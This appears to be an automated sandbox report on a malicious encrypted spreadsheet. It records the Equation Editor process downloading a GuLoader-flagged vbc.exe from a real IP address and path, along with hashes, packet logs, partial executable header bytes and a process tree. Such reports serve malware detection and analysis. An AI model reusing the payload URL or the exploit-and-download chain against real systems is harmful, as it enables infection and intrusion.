      Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
      C:\Users\user\Desktop\~$destinations.xlsx
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):165
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
      MD5:797869BB881CFBCDAC2064F92B26E46F
      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
      Malicious:false
      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      C:\Users\Public\vbc.exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):208896
      Entropy (8bit):4.14906794472717
      Encrypted:false
      SSDEEP:1536:tTEDegofhrRAnvzYFBWigYcgkOwijQkwY+EhBKDID:tQeZpR47YeigqVX+SK8
      MD5:8777020A37B6797241A489A707B9784B
      SHA1:A1ED1029B967295F9CE5E9D219F41DC6C7FC4D1A
      SHA-256:8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90
      SHA-512:0A9D13CA582DD72B4CDCE8C91A5226AEB8C70AC7A73FA5F9775C6D03753BF7EC856371F55BF5F5E38F0A1D84E375C80916E5508F89D91E7100A82C4E544174D8
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      • Antivirus: Virustotal, Detection: 27%, Browse
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......R.....................P......|.............@..........................@..............................................$...(.......&%..................................................................0... ....................................text............................... ..`.data...............................@....rsrc...&%.......0..................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:CDFV2 Encrypted
      Entropy (8bit):7.9756425195797105
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:destinations.xlsx
      File size:348152
      MD5:a4bb01370caeb6363f6dc7923585481e
      SHA1:3eff08923d9b179edcc99fe52d95a46755eac939
      SHA256:c45eacade4845c8cf141724b92d6fd4401d30233b18b17e295d2d7a9a8944c40
      SHA512:0e361f54ff22f9d8ca6315ef7bd85734a55f982a4e7f1f021dadddbbf1a8802f8f68d17ada8a90faa4a351a282aaa915f92738d0eb2b968a6b947e1ded318570
      SSDEEP:6144:RJzS5Knw3ItVVVVVVVxVVVVVVVlVVVVVVVZjVVVVVVVB2o38Q1R7naaUi7uP72AW:7zS5Knw3IhJ3JVnKSuP/oiISQ
      File Content Preview:........................>......................................................................................................................................................................................................................................

      File Icon

      Icon Hash:e4e2aa8aa4b4bcb4

      Network Behavior

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Oct 14, 2021 07:37:49.501374960 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:49.660331964 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.660433054 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:49.660953045 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:49.820924044 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.820979118 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.821048021 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:49.821048975 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.821074963 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:49.821079016 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:49.821101904 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.821149111 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:49.979698896 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.979723930 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.979737043 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.979748011 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.979764938 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.979779005 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.979790926 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.979803085 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:49.979907036 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:49.979953051 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.138530970 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138590097 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138629913 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138665915 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138715982 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138757944 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.138773918 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138792038 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.138798952 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.138825893 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138828039 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.138866901 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138905048 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.138915062 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.138919115 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138958931 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.138993979 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.139007092 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.139008999 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.139059067 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.139065027 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.139137983 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.139183044 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.139193058 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.139209032 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.139256954 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.139271975 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.139302969 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.139364004 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.139372110 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.142095089 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.297769070 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.297846079 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.297903061 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.297919035 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.297939062 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.297941923 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.297954082 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.297988892 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298016071 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298069000 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298116922 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298105955 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298135042 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298151970 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298152924 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298182964 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298187971 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298223019 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298259974 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298263073 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298269987 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298306942 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298319101 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298357010 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298397064 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298402071 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298410892 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298444033 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298453093 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298475981 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298492908 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298511982 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298522949 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298577070 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298578024 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298619986 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298649073 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298651934 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298666000 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298686028 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298702002 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298746109 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298774004 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298779964 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298780918 CEST4916780192.168.2.22192.3.121.153
      Oct 14, 2021 07:37:50.298829079 CEST8049167192.3.121.153192.168.2.22
      Oct 14, 2021 07:37:50.298877001 CEST8049167192.3.121.153192.168.2.22

      HTTP Request Dependency Graph

      • 192.3.121.153

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249167192.3.121.15380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampkBytes transferredDirectionData
      Oct 14, 2021 07:37:49.660953045 CEST0OUTGET /00800800/vbc.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 192.3.121.153
      Connection: Keep-Alive
      Oct 14, 2021 07:37:49.820924044 CEST1INHTTP/1.1 200 OK
      Date: Thu, 14 Oct 2021 05:37:49 GMT
      Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
      Last-Modified: Wed, 13 Oct 2021 14:42:26 GMT
      ETag: "33000-5ce3cf88aac57"
      Accept-Ranges: bytes
      Content-Length: 208896
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 f7 ea 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 e0 02 00 00 50 00 00 00 00 00 00 7c 13 00 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 10 00 00 ea 02 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 e0 02 00 28 00 00 00 00 10 03 00 26 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 d4 02 00 00 10 00 00 00 e0 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 ec 13 00 00 00 f0 02 00 00 10 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 26 25 00 00 00 10 03 00 00 30 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$i*.RichPELRP|@@$(&%0 .text `.data@.rsrc&%0@@IMSVBVM60.DLL


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:07:37:17
      Start date:14/10/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f8b0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:07:37:39
      Start date:14/10/2021
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:07:37:41
      Start date:14/10/2021
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\Public\vbc.exe'
      Imagebase:0x400000
      File size:208896 bytes
      MD5 hash:8777020A37B6797241A489A707B9784B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
      Antivirus matches:
      • Detection: 100%, Joe Sandbox ML
      • Detection: 27%, Virustotal, Browse
      Reputation:low

      Disassembly

      Code Analysis

      Reset < >